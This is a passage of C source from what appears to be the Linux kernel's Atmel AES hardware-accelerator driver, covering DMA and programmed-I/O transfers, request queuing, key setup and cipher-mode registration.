	} else if (dd->flags & AES_FLAGS_CFB16) {
		dd->dma_lch_in.dma_conf.dst_addr_width =
			DMA_SLAVE_BUSWIDTH_2_BYTES;
		dd->dma_lch_out.dma_conf.src_addr_width =
			DMA_SLAVE_BUSWIDTH_2_BYTES;
	} else {
		dd->dma_lch_in.dma_conf.dst_addr_width =
			DMA_SLAVE_BUSWIDTH_4_BYTES;
		dd->dma_lch_out.dma_conf.src_addr_width =
			DMA_SLAVE_BUSWIDTH_4_BYTES;
	}

	/* CFB sub-block modes must transfer one quantum at a time */
	if (dd->flags & (AES_FLAGS_CFB8 | AES_FLAGS_CFB16 |
			AES_FLAGS_CFB32 | AES_FLAGS_CFB64)) {
		dd->dma_lch_in.dma_conf.src_maxburst = 1;
		dd->dma_lch_in.dma_conf.dst_maxburst = 1;
		dd->dma_lch_out.dma_conf.src_maxburst = 1;
		dd->dma_lch_out.dma_conf.dst_maxburst = 1;
	} else {
		dd->dma_lch_in.dma_conf.src_maxburst = dd->caps.max_burst_size;
		dd->dma_lch_in.dma_conf.dst_maxburst = dd->caps.max_burst_size;
		dd->dma_lch_out.dma_conf.src_maxburst = dd->caps.max_burst_size;
		dd->dma_lch_out.dma_conf.dst_maxburst = dd->caps.max_burst_size;
	}

	dmaengine_slave_config(dd->dma_lch_in.chan, &dd->dma_lch_in.dma_conf);
	dmaengine_slave_config(dd->dma_lch_out.chan, &dd->dma_lch_out.dma_conf);

	dd->flags |= AES_FLAGS_DMA;

	/* single-entry scatterlists wrapping the two DMA addresses */
	sg_init_table(&sg[0], 1);
	sg_dma_address(&sg[0]) = dma_addr_in;
	sg_dma_len(&sg[0]) = length;

	sg_init_table(&sg[1], 1);
	sg_dma_address(&sg[1]) = dma_addr_out;
	sg_dma_len(&sg[1]) = length;

	in_desc = dmaengine_prep_slave_sg(dd->dma_lch_in.chan, &sg[0],
				1, DMA_MEM_TO_DEV,
				DMA_PREP_INTERRUPT  |  DMA_CTRL_ACK);
	if (!in_desc)
		return -EINVAL;

	out_desc = dmaengine_prep_slave_sg(dd->dma_lch_out.chan, &sg[1],
				1, DMA_DEV_TO_MEM,
				DMA_PREP_INTERRUPT | DMA_CTRL_ACK);
	if (!out_desc)
		return -EINVAL;

	/* completion is signalled by the output channel */
	out_desc->callback = atmel_aes_dma_callback;
	out_desc->callback_param = dd;

	/* start the output side first so it is ready for produced data */
	dmaengine_submit(out_desc);
	dma_async_issue_pending(dd->dma_lch_out.chan);

	dmaengine_submit(in_desc);
	dma_async_issue_pending(dd->dma_lch_in.chan);

	return 0;
}
/*
 * Programmed-I/O path for small requests: copy the whole source
 * scatterlist into the bounce buffer and write it to the input data
 * registers; completion is signalled by the DATARDY interrupt.
 * Returns 0 on success, -EINVAL on an empty/degenerate scatterlist.
 */
static int atmel_aes_crypt_cpu_start(struct atmel_aes_dev *dd)
{
	dd->flags &= ~AES_FLAGS_DMA;

	/* use cache buffers */
	dd->nb_in_sg = atmel_aes_sg_length(dd->req, dd->in_sg);
	if (!dd->nb_in_sg)
		return -EINVAL;

	dd->nb_out_sg = atmel_aes_sg_length(dd->req, dd->out_sg);
	if (!dd->nb_out_sg)
		return -EINVAL;

	dd->bufcnt = sg_copy_to_buffer(dd->in_sg, dd->nb_in_sg,
					dd->buf_in, dd->total);

	if (!dd->bufcnt)
		return -EINVAL;

	dd->total -= dd->bufcnt;

	atmel_aes_write(dd, AES_IER, AES_INT_DATARDY);
	/* bufcnt >> 2 words: relies on the block-size alignment checks
	 * done in atmel_aes_crypt(), so bufcnt is word-aligned here */
	atmel_aes_write_n(dd, AES_IDATAR(0), (u32 *) dd->buf_in,
				dd->bufcnt >> 2);

	return 0;
}
static int atmel_aes_crypt_dma_start(struct atmel_aes_dev *dd)
{
int err, fast = 0, in, out;
size_t count;
dma_addr_t addr_in, addr_out;
if ((!dd->in_offset) && (!dd->out_offset)) {
/* check for alignment */
in = IS_ALIGNED((u32)dd->in_sg->offset, sizeof(u32)) &&
IS_ALIGNED(dd->in_sg->length, dd->ctx->block_size);
out = IS_ALIGNED((u32)dd->out_sg->offset, sizeof(u32)) &&
IS_ALIGNED(dd->out_sg->length, dd->ctx->block_size);
fast = in && out;
if (sg_dma_len(dd->in_sg) != sg_dma_len(dd->out_sg))
fast = 0;
}
if (fast) {
count = min(dd->total, sg_dma_len(dd->in_sg));
count = min(count, sg_dma_len(dd->out_sg));
err = dma_map_sg(dd->dev, dd->in_sg, 1, DMA_TO_DEVICE);
if (!err) {
dev_err(dd->dev, "dma_map_sg() error\n");
return -EINVAL;
}
err = dma_map_sg(dd->dev, dd->out_sg, 1,
DMA_FROM_DEVICE);
if (!err) {
dev_err(dd->dev, "dma_map_sg() error\n");
dma_unmap_sg(dd->dev, dd->in_sg, 1,
DMA_TO_DEVICE);
return -EINVAL;
}
addr_in = sg_dma_address(dd->in_sg);
addr_out = sg_dma_address(dd->out_sg);
dd->flags |= AES_FLAGS_FAST;
} else {
/* use cache buffers */
count = atmel_aes_sg_copy(&dd->in_sg, &dd->in_offset,
dd->buf_in, dd->buflen, dd->total, 0);
addr_in = dd->dma_addr_in;
addr_out = dd->dma_addr_out;
dd->flags &= ~AES_FLAGS_FAST;
}
dd->total -= count;
err = atmel_aes_crypt_dma(dd, addr_in, addr_out, count);
if (err && (dd->flags & AES_FLAGS_FAST)) {
dma_unmap_sg(dd->dev, dd->in_sg, 1, DMA_TO_DEVICE);
dma_unmap_sg(dd->dev, dd->out_sg, 1, DMA_TO_DEVICE);
}
return err;
}
/*
 * Program the AES block for the current request: init hardware, then
 * configure key size, operating mode (ECB/CBC/CFBx/OFB/CTR), cipher
 * direction and start mode in AES_MR, load the key and finally the IV.
 * MR must be written before the IV registers (hardware requirement,
 * see comment below).  Returns 0 or an init error.
 */
static int atmel_aes_write_ctrl(struct atmel_aes_dev *dd)
{
	int err;
	u32 valcr = 0, valmr = 0;

	err = atmel_aes_hw_init(dd);

	if (err)
		return err;

	/* MR register must be set before IV registers */
	if (dd->ctx->keylen == AES_KEYSIZE_128)
		valmr |= AES_MR_KEYSIZE_128;
	else if (dd->ctx->keylen == AES_KEYSIZE_192)
		valmr |= AES_MR_KEYSIZE_192;
	else
		valmr |= AES_MR_KEYSIZE_256;

	if (dd->flags & AES_FLAGS_CBC) {
		valmr |= AES_MR_OPMOD_CBC;
	} else if (dd->flags & AES_FLAGS_CFB) {
		valmr |= AES_MR_OPMOD_CFB;
		/* select the CFB segment size */
		if (dd->flags & AES_FLAGS_CFB8)
			valmr |= AES_MR_CFBS_8b;
		else if (dd->flags & AES_FLAGS_CFB16)
			valmr |= AES_MR_CFBS_16b;
		else if (dd->flags & AES_FLAGS_CFB32)
			valmr |= AES_MR_CFBS_32b;
		else if (dd->flags & AES_FLAGS_CFB64)
			valmr |= AES_MR_CFBS_64b;
		else if (dd->flags & AES_FLAGS_CFB128)
			valmr |= AES_MR_CFBS_128b;
	} else if (dd->flags & AES_FLAGS_OFB) {
		valmr |= AES_MR_OPMOD_OFB;
	} else if (dd->flags & AES_FLAGS_CTR) {
		valmr |= AES_MR_OPMOD_CTR;
	} else {
		valmr |= AES_MR_OPMOD_ECB;
	}

	if (dd->flags & AES_FLAGS_ENCRYPT)
		valmr |= AES_MR_CYPHER_ENC;

	/* large requests go through DMA; small ones use auto start */
	if (dd->total > ATMEL_AES_DMA_THRESHOLD) {
		valmr |= AES_MR_SMOD_IDATAR0;
		if (dd->caps.has_dualbuff)
			valmr |= AES_MR_DUALBUFF;
	} else {
		valmr |= AES_MR_SMOD_AUTO;
	}

	atmel_aes_write(dd, AES_CR, valcr);
	atmel_aes_write(dd, AES_MR, valmr);

	atmel_aes_write_n(dd, AES_KEYWR(0), dd->ctx->key,
						dd->ctx->keylen >> 2);

	/* all IV-bearing modes load a 128-bit IV/counter, if provided */
	if (((dd->flags & AES_FLAGS_CBC) || (dd->flags & AES_FLAGS_CFB) ||
	   (dd->flags & AES_FLAGS_OFB) || (dd->flags & AES_FLAGS_CTR)) &&
	   dd->req->info) {
		atmel_aes_write_n(dd, AES_IVR(0), dd->req->info, 4);
	}

	return 0;
}
/*
 * Enqueue @req (may be NULL to just kick the queue) and, if the engine
 * is idle, dequeue and start the next request.  Returns the enqueue
 * status (-EINPROGRESS/-EBUSY) when @req was queued, 0 otherwise.
 * Queue and BUSY flag are protected by dd->lock.
 */
static int atmel_aes_handle_queue(struct atmel_aes_dev *dd,
			       struct ablkcipher_request *req)
{
	struct crypto_async_request *async_req, *backlog;
	struct atmel_aes_ctx *ctx;
	struct atmel_aes_reqctx *rctx;
	unsigned long flags;
	int err, ret = 0;

	spin_lock_irqsave(&dd->lock, flags);
	if (req)
		ret = ablkcipher_enqueue_request(&dd->queue, req);
	if (dd->flags & AES_FLAGS_BUSY) {
		/* engine already running; it will pick this up later */
		spin_unlock_irqrestore(&dd->lock, flags);
		return ret;
	}
	backlog = crypto_get_backlog(&dd->queue);
	async_req = crypto_dequeue_request(&dd->queue);
	if (async_req)
		dd->flags |= AES_FLAGS_BUSY;
	spin_unlock_irqrestore(&dd->lock, flags);

	if (!async_req)
		return ret;

	/* tell a backlogged submitter its request is now in progress */
	if (backlog)
		backlog->complete(backlog, -EINPROGRESS);

	req = ablkcipher_request_cast(async_req);

	/* assign new request to device */
	dd->req = req;
	dd->total = req->nbytes;
	dd->in_offset = 0;
	dd->in_sg = req->src;
	dd->out_offset = 0;
	dd->out_sg = req->dst;

	rctx = ablkcipher_request_ctx(req);
	ctx = crypto_ablkcipher_ctx(crypto_ablkcipher_reqtfm(req));
	rctx->mode &= AES_FLAGS_MODE_MASK;
	dd->flags = (dd->flags & ~AES_FLAGS_MODE_MASK) | rctx->mode;
	dd->ctx = ctx;
	ctx->dd = dd;

	err = atmel_aes_write_ctrl(dd);
	if (!err) {
		if (dd->total > ATMEL_AES_DMA_THRESHOLD)
			err = atmel_aes_crypt_dma_start(dd);
		else
			err = atmel_aes_crypt_cpu_start(dd);
	}
	if (err) {
		/* aes_task will not finish it, so do it here */
		atmel_aes_finish_req(dd, err);
		tasklet_schedule(&dd->queue_task);
	}

	return ret;
}
/*
 * Finish a completed DMA transfer: unmap the fast-path scatterlists
 * or, on the bounce-buffer path, hand the output buffer back to the
 * CPU and copy it into the destination scatterlist.
 *
 * Fixes: sync direction was *_for_device before a CPU read — it must
 * be dma_sync_single_for_cpu(); and "%u" for a size_t is undefined
 * behavior on LP64, use "%zu".
 */
static int atmel_aes_crypt_dma_stop(struct atmel_aes_dev *dd)
{
	int err = -EINVAL;
	size_t count;

	if (dd->flags & AES_FLAGS_DMA) {
		err = 0;
		if  (dd->flags & AES_FLAGS_FAST) {
			dma_unmap_sg(dd->dev, dd->out_sg, 1, DMA_FROM_DEVICE);
			dma_unmap_sg(dd->dev, dd->in_sg, 1, DMA_TO_DEVICE);
		} else {
			/* give the device-written bytes back to the CPU
			 * before reading them out */
			dma_sync_single_for_cpu(dd->dev, dd->dma_addr_out,
				dd->dma_size, DMA_FROM_DEVICE);

			/* copy data */
			count = atmel_aes_sg_copy(&dd->out_sg, &dd->out_offset,
				dd->buf_out, dd->buflen, dd->dma_size, 1);

			if (count != dd->dma_size) {
				err = -EINVAL;
				pr_err("not all data converted: %zu\n", count);
			}
		}
	}

	return err;
}
static int atmel_aes_buff_init(struct atmel_aes_dev *dd)
{
int err = -ENOMEM;
dd->buf_in = (void *)__get_free_pages(GFP_KERNEL, 0);
dd->buf_out = (void *)__get_free_pages(GFP_KERNEL, 0);
dd->buflen = PAGE_SIZE;
dd->buflen &= ~(AES_BLOCK_SIZE - 1);
if (!dd->buf_in || !dd->buf_out) {
dev_err(dd->dev, "unable to alloc pages.\n");
goto err_alloc;
}
/* MAP here */
dd->dma_addr_in = dma_map_single(dd->dev, dd->buf_in,
dd->buflen, DMA_TO_DEVICE);
if (dma_mapping_error(dd->dev, dd->dma_addr_in)) {
dev_err(dd->dev, "dma %d bytes error\n", dd->buflen);
err = -EINVAL;
goto err_map_in;
}
dd->dma_addr_out = dma_map_single(dd->dev, dd->buf_out,
dd->buflen, DMA_FROM_DEVICE);
if (dma_mapping_error(dd->dev, dd->dma_addr_out)) {
dev_err(dd->dev, "dma %d bytes error\n", dd->buflen);
err = -EINVAL;
goto err_map_out;
}
return 0;
err_map_out:
dma_unmap_single(dd->dev, dd->dma_addr_in, dd->buflen,
DMA_TO_DEVICE);
err_map_in:
free_page((unsigned long)dd->buf_out);
free_page((unsigned long)dd->buf_in);
err_alloc:
if (err)
pr_err("error: %d\n", err);
return err;
}
/* Undo atmel_aes_buff_init(): unmap both bounce buffers, then return
 * their pages to the allocator. */
static void atmel_aes_buff_cleanup(struct atmel_aes_dev *dd)
{
	dma_unmap_single(dd->dev, dd->dma_addr_in, dd->buflen,
			 DMA_TO_DEVICE);
	dma_unmap_single(dd->dev, dd->dma_addr_out, dd->buflen,
			 DMA_FROM_DEVICE);
	free_page((unsigned long)dd->buf_in);
	free_page((unsigned long)dd->buf_out);
}
static int atmel_aes_crypt(struct ablkcipher_request *req, unsigned long mode)
{
struct atmel_aes_ctx *ctx = crypto_ablkcipher_ctx(
crypto_ablkcipher_reqtfm(req));
struct atmel_aes_reqctx *rctx = ablkcipher_request_ctx(req);
struct atmel_aes_dev *dd;
if (mode & AES_FLAGS_CFB8) {
if (!IS_ALIGNED(req->nbytes, CFB8_BLOCK_SIZE)) {
pr_err("request size is not exact amount of CFB8 blocks\n");
return -EINVAL;
}
ctx->block_size = CFB8_BLOCK_SIZE;
} else if (mode & AES_FLAGS_CFB16) {
if (!IS_ALIGNED(req->nbytes, CFB16_BLOCK_SIZE)) {
pr_err("request size is not exact amount of CFB16 blocks\n");
return -EINVAL;
}
ctx->block_size = CFB16_BLOCK_SIZE;
} else if (mode & AES_FLAGS_CFB32) {
if (!IS_ALIGNED(req->nbytes, CFB32_BLOCK_SIZE)) {
pr_err("request size is not exact amount of CFB32 blocks\n");
return -EINVAL;
}
ctx->block_size = CFB32_BLOCK_SIZE;
} else {
if (!IS_ALIGNED(req->nbytes, AES_BLOCK_SIZE)) {
pr_err("request size is not exact amount of AES blocks\n");
return -EINVAL;
}
ctx->block_size = AES_BLOCK_SIZE;
}
dd = atmel_aes_find_dev(ctx);
if (!dd)
return -ENODEV;
rctx->mode = mode;
return atmel_aes_handle_queue(dd, req);
}
/* dmaengine channel filter: accept only channels belonging to the DMA
 * controller named in the platform data, and stash the slave config. */
static bool atmel_aes_filter(struct dma_chan *chan, void *slave)
{
	struct at_dma_slave *sl = slave;

	if (!sl || sl->dma_dev != chan->device->dev)
		return false;

	chan->private = sl;
	return true;
}
/*
 * Acquire and configure the two DMA channels (memory -> AES_IDATAR and
 * AES_ODATAR -> memory) described by the platform data.  Returns 0,
 * -ENODEV when no slave data is provided, or -ENOMEM when a channel
 * cannot be obtained.
 */
static int atmel_aes_dma_init(struct atmel_aes_dev *dd,
			struct crypto_platform_data *pdata)
{
	int err = -ENOMEM;
	dma_cap_mask_t mask_in, mask_out;

	if (pdata && pdata->dma_slave->txdata.dma_dev &&
		pdata->dma_slave->rxdata.dma_dev) {

		/* Try to grab 2 DMA channels */
		dma_cap_zero(mask_in);
		dma_cap_set(DMA_SLAVE, mask_in);

		dd->dma_lch_in.chan = dma_request_channel(mask_in,
				atmel_aes_filter, &pdata->dma_slave->rxdata);

		if (!dd->dma_lch_in.chan)
			goto err_dma_in;

		/* input channel: memory to the AES input data register */
		dd->dma_lch_in.dma_conf.direction = DMA_MEM_TO_DEV;
		dd->dma_lch_in.dma_conf.dst_addr = dd->phys_base +
			AES_IDATAR(0);
		dd->dma_lch_in.dma_conf.src_maxburst = dd->caps.max_burst_size;
		dd->dma_lch_in.dma_conf.src_addr_width =
			DMA_SLAVE_BUSWIDTH_4_BYTES;
		dd->dma_lch_in.dma_conf.dst_maxburst = dd->caps.max_burst_size;
		dd->dma_lch_in.dma_conf.dst_addr_width =
			DMA_SLAVE_BUSWIDTH_4_BYTES;
		dd->dma_lch_in.dma_conf.device_fc = false;

		dma_cap_zero(mask_out);
		dma_cap_set(DMA_SLAVE, mask_out);
		dd->dma_lch_out.chan = dma_request_channel(mask_out,
				atmel_aes_filter, &pdata->dma_slave->txdata);

		if (!dd->dma_lch_out.chan)
			goto err_dma_out;

		/* output channel: AES output data register to memory */
		dd->dma_lch_out.dma_conf.direction = DMA_DEV_TO_MEM;
		dd->dma_lch_out.dma_conf.src_addr = dd->phys_base +
			AES_ODATAR(0);
		dd->dma_lch_out.dma_conf.src_maxburst = dd->caps.max_burst_size;
		dd->dma_lch_out.dma_conf.src_addr_width =
			DMA_SLAVE_BUSWIDTH_4_BYTES;
		dd->dma_lch_out.dma_conf.dst_maxburst = dd->caps.max_burst_size;
		dd->dma_lch_out.dma_conf.dst_addr_width =
			DMA_SLAVE_BUSWIDTH_4_BYTES;
		dd->dma_lch_out.dma_conf.device_fc = false;

		return 0;
	} else {
		return -ENODEV;
	}

err_dma_out:
	dma_release_channel(dd->dma_lch_in.chan);
err_dma_in:
	return err;
}
/* Release both DMA channels obtained in atmel_aes_dma_init(). */
static void atmel_aes_dma_cleanup(struct atmel_aes_dev *dd)
{
	dma_release_channel(dd->dma_lch_in.chan);
	dma_release_channel(dd->dma_lch_out.chan);
}
/*
 * Install a new AES key into the tfm context.  Only the three standard
 * AES key sizes are accepted; anything else flags the tfm with
 * CRYPTO_TFM_RES_BAD_KEY_LEN and fails with -EINVAL.
 */
static int atmel_aes_setkey(struct crypto_ablkcipher *tfm, const u8 *key,
			unsigned int keylen)
{
	struct atmel_aes_ctx *ctx = crypto_ablkcipher_ctx(tfm);

	switch (keylen) {
	case AES_KEYSIZE_128:
	case AES_KEYSIZE_192:
	case AES_KEYSIZE_256:
		break;
	default:
		crypto_ablkcipher_set_flags(tfm, CRYPTO_TFM_RES_BAD_KEY_LEN);
		return -EINVAL;
	}

	memcpy(ctx->key, key, keylen);
	ctx->keylen = keylen;
	return 0;
}
/*
 * Thin per-mode entry points registered in aes_algs[] / aes_cfb64_alg.
 * Each one just forwards to atmel_aes_crypt() with the flag combination
 * describing the cipher mode and direction (AES_FLAGS_ENCRYPT set for
 * encryption, clear for decryption).
 */
static int atmel_aes_ecb_encrypt(struct ablkcipher_request *req)
{
	return atmel_aes_crypt(req, AES_FLAGS_ENCRYPT);
}
static int atmel_aes_ecb_decrypt(struct ablkcipher_request *req)
{
	return atmel_aes_crypt(req, 0);
}
static int atmel_aes_cbc_encrypt(struct ablkcipher_request *req)
{
	return atmel_aes_crypt(req, AES_FLAGS_ENCRYPT | AES_FLAGS_CBC);
}
static int atmel_aes_cbc_decrypt(struct ablkcipher_request *req)
{
	return atmel_aes_crypt(req, AES_FLAGS_CBC);
}
static int atmel_aes_ofb_encrypt(struct ablkcipher_request *req)
{
	return atmel_aes_crypt(req, AES_FLAGS_ENCRYPT | AES_FLAGS_OFB);
}
static int atmel_aes_ofb_decrypt(struct ablkcipher_request *req)
{
	return atmel_aes_crypt(req, AES_FLAGS_OFB);
}
static int atmel_aes_cfb_encrypt(struct ablkcipher_request *req)
{
	return atmel_aes_crypt(req,
			AES_FLAGS_ENCRYPT | AES_FLAGS_CFB | AES_FLAGS_CFB128);
}
static int atmel_aes_cfb_decrypt(struct ablkcipher_request *req)
{
	return atmel_aes_crypt(req, AES_FLAGS_CFB | AES_FLAGS_CFB128);
}
static int atmel_aes_cfb64_encrypt(struct ablkcipher_request *req)
{
	return atmel_aes_crypt(req,
			AES_FLAGS_ENCRYPT | AES_FLAGS_CFB | AES_FLAGS_CFB64);
}
static int atmel_aes_cfb64_decrypt(struct ablkcipher_request *req)
{
	return atmel_aes_crypt(req, AES_FLAGS_CFB | AES_FLAGS_CFB64);
}
static int atmel_aes_cfb32_encrypt(struct ablkcipher_request *req)
{
	return atmel_aes_crypt(req,
			AES_FLAGS_ENCRYPT | AES_FLAGS_CFB | AES_FLAGS_CFB32);
}
static int atmel_aes_cfb32_decrypt(struct ablkcipher_request *req)
{
	return atmel_aes_crypt(req, AES_FLAGS_CFB | AES_FLAGS_CFB32);
}
static int atmel_aes_cfb16_encrypt(struct ablkcipher_request *req)
{
	return atmel_aes_crypt(req,
			AES_FLAGS_ENCRYPT | AES_FLAGS_CFB | AES_FLAGS_CFB16);
}
static int atmel_aes_cfb16_decrypt(struct ablkcipher_request *req)
{
	return atmel_aes_crypt(req, AES_FLAGS_CFB | AES_FLAGS_CFB16);
}
static int atmel_aes_cfb8_encrypt(struct ablkcipher_request *req)
{
	return atmel_aes_crypt(req,
			AES_FLAGS_ENCRYPT | AES_FLAGS_CFB | AES_FLAGS_CFB8);
}
static int atmel_aes_cfb8_decrypt(struct ablkcipher_request *req)
{
	return atmel_aes_crypt(req, AES_FLAGS_CFB | AES_FLAGS_CFB8);
}
static int atmel_aes_ctr_encrypt(struct ablkcipher_request *req)
{
	return atmel_aes_crypt(req, AES_FLAGS_ENCRYPT | AES_FLAGS_CTR);
}
static int atmel_aes_ctr_decrypt(struct ablkcipher_request *req)
{
	return atmel_aes_crypt(req, AES_FLAGS_CTR);
}
/* tfm constructor: reserve per-request context space for our reqctx. */
static int atmel_aes_cra_init(struct crypto_tfm *tfm)
{
	tfm->crt_ablkcipher.reqsize = sizeof(struct atmel_aes_reqctx);
	return 0;
}
/* tfm destructor: nothing to free, the context lives inside the tfm. */
static void atmel_aes_cra_exit(struct crypto_tfm *tfm)
{
}
static struct crypto_alg aes_algs[] = {
{
.cra_name = "ecb(aes)",
.cra_driver_name = "atmel-ecb-aes",
.cra_priority = 100,
.cra_flags = CRYPTO_ALG_TYPE_ABLKCIPHER | CRYPTO_ALG_ASYNC,
.cra_blocksize = AES_BLOCK_SIZE,
.cra_ctxsize = sizeof(struct atmel_aes_ctx),
.cra_alignmask = 0xf,
.cra_type = &crypto_ablkcipher_type,
.cra_module = THIS_MODULE,
.cra_init = atmel_aes_cra_init,
.cra_exit = atmel_aes_cra_exit,
.cra_u.ablkcipher = {
.min_keysize = AES_MIN_KEY_SIZE,
.max_keysize = AES_MAX_KEY_SIZE,
.setkey = atmel_aes_setkey,
.encrypt = atmel_aes_ecb_encrypt,
.decrypt = atmel_aes_ecb_decrypt,
}
},
{
.cra_name = "cbc(aes)",
.cra_driver_name = "atmel-cbc-aes",
.cra_priority = 100,
.cra_flags = CRYPTO_ALG_TYPE_ABLKCIPHER | CRYPTO_ALG_ASYNC,
.cra_blocksize = AES_BLOCK_SIZE,
.cra_ctxsize = sizeof(struct atmel_aes_ctx),
.cra_alignmask = 0xf,
.cra_type = &crypto_ablkcipher_type,
.cra_module = THIS_MODULE,
.cra_init = atmel_aes_cra_init,
.cra_exit = atmel_aes_cra_exit,
.cra_u.ablkcipher = {
.min_keysize = AES_MIN_KEY_SIZE,
.max_keysize = AES_MAX_KEY_SIZE,
.ivsize = AES_BLOCK_SIZE,
.setkey = atmel_aes_setkey,
.encrypt = atmel_aes_cbc_encrypt,
.decrypt = atmel_aes_cbc_decrypt,
}
},
{
.cra_name = "ofb(aes)",
.cra_driver_name = "atmel-ofb-aes",
.cra_priority = 100,
.cra_flags = CRYPTO_ALG_TYPE_ABLKCIPHER | CRYPTO_ALG_ASYNC,
.cra_blocksize = AES_BLOCK_SIZE,
.cra_ctxsize = sizeof(struct atmel_aes_ctx),
.cra_alignmask = 0xf,
.cra_type = &crypto_ablkcipher_type,
.cra_module = THIS_MODULE,
.cra_init = atmel_aes_cra_init,
.cra_exit = atmel_aes_cra_exit,
.cra_u.ablkcipher = {
.min_keysize = AES_MIN_KEY_SIZE,
.max_keysize = AES_MAX_KEY_SIZE,
.ivsize = AES_BLOCK_SIZE,
.setkey = atmel_aes_setkey,
.encrypt = atmel_aes_ofb_encrypt,
.decrypt = atmel_aes_ofb_decrypt,
}
},
{
.cra_name = "cfb(aes)",
.cra_driver_name = "atmel-cfb-aes",
.cra_priority = 100,
.cra_flags = CRYPTO_ALG_TYPE_ABLKCIPHER | CRYPTO_ALG_ASYNC,
.cra_blocksize = AES_BLOCK_SIZE,
.cra_ctxsize = sizeof(struct atmel_aes_ctx),
.cra_alignmask = 0xf,
.cra_type = &crypto_ablkcipher_type,
.cra_module = THIS_MODULE,
.cra_init = atmel_aes_cra_init,
.cra_exit = atmel_aes_cra_exit,
.cra_u.ablkcipher = {
.min_keysize = AES_MIN_KEY_SIZE,
.max_keysize = AES_MAX_KEY_SIZE,
.ivsize = AES_BLOCK_SIZE,
.setkey = atmel_aes_setkey,
.encrypt = atmel_aes_cfb_encrypt,
.decrypt = atmel_aes_cfb_decrypt,
}
},
{
.cra_name = "cfb32(aes)",
.cra_driver_name = "atmel-cfb32-aes",
.cra_priority = 100,
.cra_flags = CRYPTO_ALG_TYPE_ABLKCIPHER | CRYPTO_ALG_ASYNC,
.cra_blocksize = CFB32_BLOCK_SIZE,
.cra_ctxsize = sizeof(struct atmel_aes_ctx),
.cra_alignmask = 0x3,
.cra_type = &crypto_ablkcipher_type,
.cra_module = THIS_MODULE,
.cra_init = atmel_aes_cra_init,
.cra_exit = atmel_aes_cra_exit,
.cra_u.ablkcipher = {
.min_keysize = AES_MIN_KEY_SIZE,
.max_keysize = AES_MAX_KEY_SIZE,
.ivsize = AES_BLOCK_SIZE,
.setkey = atmel_aes_setkey,
.encrypt = atmel_aes_cfb32_encrypt,
.decrypt = atmel_aes_cfb32_decrypt,
}
},
{
.cra_name = "cfb16(aes)",
.cra_driver_name = "atmel-cfb16-aes",
.cra_priority = 100,
.cra_flags = CRYPTO_ALG_TYPE_ABLKCIPHER | CRYPTO_ALG_ASYNC,
.cra_blocksize = CFB16_BLOCK_SIZE,
.cra_ctxsize = sizeof(struct atmel_aes_ctx),
.cra_alignmask = 0x1,
.cra_type = &crypto_ablkcipher_type,
.cra_module = THIS_MODULE,
.cra_init = atmel_aes_cra_init,
.cra_exit = atmel_aes_cra_exit,
.cra_u.ablkcipher = {
.min_keysize = AES_MIN_KEY_SIZE,
.max_keysize = AES_MAX_KEY_SIZE,
.ivsize = AES_BLOCK_SIZE,
.setkey = atmel_aes_setkey,
.encrypt = atmel_aes_cfb16_encrypt,
.decrypt = atmel_aes_cfb16_decrypt,
}
},
{
.cra_name = "cfb8(aes)",
.cra_driver_name = "atmel-cfb8-aes",
.cra_priority = 100,
.cra_flags = CRYPTO_ALG_TYPE_ABLKCIPHER | CRYPTO_ALG_ASYNC,
.cra_blocksize = CFB64_BLOCK_SIZE,
.cra_ctxsize = sizeof(struct atmel_aes_ctx),
.cra_alignmask = 0x0,
.cra_type = &crypto_ablkcipher_type,
.cra_module = THIS_MODULE,
.cra_init = atmel_aes_cra_init,
.cra_exit = atmel_aes_cra_exit,
.cra_u.ablkcipher = {
.min_keysize = AES_MIN_KEY_SIZE,
.max_keysize = AES_MAX_KEY_SIZE,
.ivsize = AES_BLOCK_SIZE,
.setkey = atmel_aes_setkey,
.encrypt = atmel_aes_cfb8_encrypt,
.decrypt = atmel_aes_cfb8_decrypt,
}
},
{
.cra_name = "ctr(aes)",
.cra_driver_name = "atmel-ctr-aes",
.cra_priority = 100,
.cra_flags = CRYPTO_ALG_TYPE_ABLKCIPHER | CRYPTO_ALG_ASYNC,
.cra_blocksize = AES_BLOCK_SIZE,
.cra_ctxsize = sizeof(struct atmel_aes_ctx),
.cra_alignmask = 0xf,
.cra_type = &crypto_ablkcipher_type,
.cra_module = THIS_MODULE,
.cra_init = atmel_aes_cra_init,
.cra_exit = atmel_aes_cra_exit,
.cra_u.ablkcipher = {
.min_keysize = AES_MIN_KEY_SIZE,
.max_keysize = AES_MAX_KEY_SIZE,
.ivsize = AES_BLOCK_SIZE,
.setkey = atmel_aes_setkey,
.encrypt = atmel_aes_ctr_encrypt,
.decrypt = atmel_aes_ctr_decrypt,
}
},
};
/*
 * cfb64(aes) is only available on IP versions that advertise the
 * capability (see atmel_aes_get_cap), so it is kept out of aes_algs[]
 * and registered conditionally in atmel_aes_register_algs().
 */
static struct crypto_alg aes_cfb64_alg = {
	.cra_name		= "cfb64(aes)",
	.cra_driver_name	= "atmel-cfb64-aes",
	.cra_priority		= 100,
	.cra_flags		= CRYPTO_ALG_TYPE_ABLKCIPHER | CRYPTO_ALG_ASYNC,
	.cra_blocksize		= CFB64_BLOCK_SIZE,
	.cra_ctxsize		= sizeof(struct atmel_aes_ctx),
	.cra_alignmask		= 0x7,
	.cra_type		= &crypto_ablkcipher_type,
	.cra_module		= THIS_MODULE,
	.cra_init		= atmel_aes_cra_init,
	.cra_exit		= atmel_aes_cra_exit,
	.cra_u.ablkcipher = {
		.min_keysize	= AES_MIN_KEY_SIZE,
		.max_keysize	= AES_MAX_KEY_SIZE,
		.ivsize		= AES_BLOCK_SIZE,
		.setkey		= atmel_aes_setkey,
		.encrypt	= atmel_aes_cfb64_encrypt,
		.decrypt	= atmel_aes_cfb64_decrypt,
	}
};
/* Tasklet: kick the request queue when the engine becomes idle. */
static void atmel_aes_queue_task(unsigned long data)
{
	struct atmel_aes_dev *dd = (struct atmel_aes_dev *)data;
	atmel_aes_handle_queue(dd, NULL);
}
/*
 * Tasklet: completion handler scheduled from the IRQ.
 *
 * CPU (PIO) mode: read the processed data out of the engine and copy it
 * back into the request's scatterlist, then finish the request.
 *
 * DMA mode: stop the current transfer; if more data remains, advance the
 * scatterlists (fast path) and start the next DMA chunk, returning
 * without finishing.  On completion or error, finish the request and
 * pump the queue again.
 */
static void atmel_aes_done_task(unsigned long data)
{
	struct atmel_aes_dev *dd = (struct atmel_aes_dev *) data;
	int err;
	if (!(dd->flags & AES_FLAGS_DMA)) {
		/* PIO completion: drain the output FIFO word by word */
		atmel_aes_read_n(dd, AES_ODATAR(0), (u32 *) dd->buf_out,
				dd->bufcnt >> 2);
